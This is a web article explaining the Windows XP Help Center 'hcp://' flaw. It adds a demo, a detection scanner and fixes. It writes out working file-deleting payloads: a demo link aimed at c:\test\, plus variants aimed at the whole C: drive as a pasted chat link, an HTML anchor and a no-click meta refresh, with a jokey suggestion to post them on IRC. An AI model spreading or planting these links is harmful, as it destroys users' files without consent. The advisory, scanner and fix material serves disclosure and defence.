Windows XP Security Flaw - Fix it Now!
Quick Fix: Download and run a small program called XPdite, and/or read on for an explanation and safe demonstration of the "Help" exploit. This demo will not harm your computer.
A very serious flaw has been discovered in, ironically, the "Help Center" included in Windows XP. This flaw is considered critical because a malicious URL (web-style link) could be delivered to any XP user through any means: via an email solicitation, a chat room, a newsgroup posting, or a malicious web page. It could even be processed automatically, without the user clicking anything, merely by visiting a malicious web page. More information about a fix for this exploit can be found here.
Windows XP Service Pack 1 will also fix this nasty security flaw. If you need to adjust the Windows XP Product Activation Key to allow Service Pack 1 installation, you want to know this Windows hack. Wow, Microsoft should really hire some competent staff...
Demonstration
To try it out, do the following, but BE WARNED: it will delete ANYTHING you put in the "test" directory. (I should point out, sub-directories aren't deleted, and user permissions may have an effect.)
Create a folder called "test" at the root directory of your hard drive (i.e. c:\test\).
Put some files in it (junk, files you don't care about losing - create some new text documents or something).
Then, copy and paste the "link" below into your address bar and hit enter.
Wait a few seconds; the "Help Center" should pop up. Then, once you've closed the Help Center, check that directory again. You should notice the files in the directory you created are gone.
This should be frightening to any Windows XP user, because anyone could link it on any webpage. It is definitely a terrible flaw in the Windows Help Center included in XP.
Copy and paste this link into your address bar and hit enter:
hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*
- or click here.
If someone were feeling particularly malicious, they could, for example:
* paste something like "hcp://system/DFS/uplddrvinfo.htm?file://c:\\*" on IRC channels full of dumb kids..
* <a href="hcp://system/DFS/uplddrvinfo.htm?file://c:\\*">Windows XP Rox0rz</a> ..
* <meta http-equiv="Refresh" content="1;hcp://system/DFS/uplddrvinfo.htm?file://c:\\*"> ..
(I'm aware deleting c:\* on an XP machine won't accomplish much - you get the idea though..)
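An added example, not part of the original page: a small Python scanner that a mail, chat or web filter could use to flag hcp:// links reaching uplddrvinfo.htm in the three forms listed above (pasted text, anchor, meta refresh). The function names and the sample input are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Any hcp:// URL token; quotes, angle brackets and whitespace end the token.
TOKEN_RE = re.compile(r'hcp://[^\s"\'<>]+', re.IGNORECASE)


def classify(line, start):
    """Name the delivery vector from the markup just before the URL."""
    before = line[:start].lower()
    if re.search(r'<meta[^>]*http-equiv\s*=\s*["\']?refresh[^>]*$', before):
        return "meta-refresh"   # loads with no click
    if re.search(r'href\s*=\s*["\']?$', before):
        return "anchor"         # clickable link
    return "plain-text"         # pasted into chat, mail or a newsgroup post


def find_hcp_delete_links(text):
    """Return (line_no, vector, argument) for each URL that reaches
    uplddrvinfo.htm, the Help Center page named in this article."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in TOKEN_RE.finditer(line):
            # Decode %xx first so an encoded '?' or path is still recognised.
            path, _, arg = unquote(m.group(0)).partition("?")
            if path.lower().endswith("uplddrvinfo.htm"):
                hits.append((line_no, classify(line, m.start()), arg))
    return hits


# Constructed sample input: the article's c:\test\ demo URL in each form it
# lists, a percent-encoded variant, and an unrelated hcp:// link (made up).
SAMPLE = r'''Check this out: hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*
<a href="hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*">click</a>
<meta http-equiv="Refresh" content="1;hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*">
<a href="HCP://system/DFS/UPLDDRVINFO.HTM%3Ffile%3A%2F%2Fc%3A%5Ctest%5C*">encoded</a>
<a href="hcp://services/subsite?node=Example">unrelated Help Center link</a>
'''

if __name__ == "__main__":
    for hit in find_hcp_delete_links(SAMPLE):
        print(hit)
```

The argument field shows what the link would ask the Help Center page to act on, which is the part worth logging when a hit is blocked.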
Easy Fix(es)
- Delete or rename the file: "C:\WINDOWS\PCHEALTH\HELPCTR\System\DFS\uplddrvinfo.htm"
- Find and remove the following code from "uplddrvinfo.htm":

    var oFSO = new ActiveXObject ( "Scripting.FileSystemObject" );
    try
    {
        oFSO.DeleteFile( sFile );
    }

- Download and run a small program called XPdite.
- Install Linux ;p